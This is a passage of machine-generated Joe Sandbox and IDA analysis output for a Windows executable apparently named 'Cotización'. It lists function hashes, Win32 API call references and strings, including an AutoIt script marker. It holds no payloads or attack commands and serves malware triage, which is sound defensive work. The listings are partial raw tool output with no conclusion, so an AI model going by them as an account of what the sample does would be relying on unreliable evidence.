                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: >>>AUTOIT SCRIPT<<<$\
                • API String ID: 0-1896584978
                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll$IconLoad
                • String ID: blank$info$question$stop$warning
                • API String ID: 2485277191-404129466
                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                APIs
                • LoadIconW.USER32(?,00000063), ref: 0045464C
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                • SetWindowTextW.USER32(?,?), ref: 00454678
                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                • GetWindowRect.USER32(?,?), ref: 004546F5
                • SetWindowTextW.USER32(?,?), ref: 00454765
                • GetDesktopWindow.USER32 ref: 0045476F
                • GetWindowRect.USER32(00000000), ref: 00454776
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                • GetClientRect.USER32(?,?), ref: 004547D2
                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                • String ID:
                • API String ID: 3869813825-0
                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                APIs
                • _wcslen.LIBCMT ref: 00464B28
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                • _wcslen.LIBCMT ref: 00464C28
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                • _wcslen.LIBCMT ref: 00464CBA
                • _wcslen.LIBCMT ref: 00464CD0
                • _wcslen.LIBCMT ref: 00464CEF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$Directory$CurrentSystem
                • String ID: D
                • API String ID: 1914653954-2746444292
                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                APIs
                • _wcsncpy.LIBCMT ref: 0045CE39
                • __wsplitpath.LIBCMT ref: 0045CE78
                • _wcscat.LIBCMT ref: 0045CE8B
                • _wcscat.LIBCMT ref: 0045CE9E
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                • _wcscpy.LIBCMT ref: 0045CF61
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                • String ID: *.*
                • API String ID: 1153243558-438819550
                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsicoll
                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                • API String ID: 3832890014-4202584635
                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                APIs
                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                • GetFocus.USER32 ref: 0046A0DD
                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessagePost$CtrlFocus
                • String ID: 0
                • API String ID: 1534620443-4108050209
                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                APIs
                • DestroyWindow.USER32(?), ref: 004558E3
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$CreateDestroy
                • String ID: ,$tooltips_class32
                • API String ID: 1109047481-3856767331
                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                APIs
                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                • GetMenuItemCount.USER32(?), ref: 00468C45
                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                • GetMenuItemCount.USER32 ref: 00468CFD
                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                • GetCursorPos.USER32(?), ref: 00468D3F
                • SetForegroundWindow.USER32(?), ref: 00468D49
                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                • String ID: 0
                • API String ID: 1441871840-4108050209
                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                • API String ID: 3631882475-2268648507
                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                APIs
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                • SendMessageW.USER32 ref: 00471740
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                • SendMessageW.USER32 ref: 0047184F
                • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 4116747274-0
                • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                APIs
                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                • _wcslen.LIBCMT ref: 00461683
                • __swprintf.LIBCMT ref: 00461721
                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                • GetDlgCtrlID.USER32(?), ref: 00461869
                • GetWindowRect.USER32(?,?), ref: 004618A4
                • GetParent.USER32(?), ref: 004618C3
                • ScreenToClient.USER32(00000000), ref: 004618CA
                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                • String ID: %s%u
                • API String ID: 1899580136-679674701
                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                APIs
                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: InfoItemMenu$Sleep
                • String ID: 0
                • API String ID: 1196289194-4108050209
                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                APIs
                • GetDC.USER32(00000000), ref: 0043143E
                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                • SelectObject.GDI32(00000000,?), ref: 00431466
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                • String ID: (
                • API String ID: 3300687185-3887548279
                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32 ref: 0045DB32
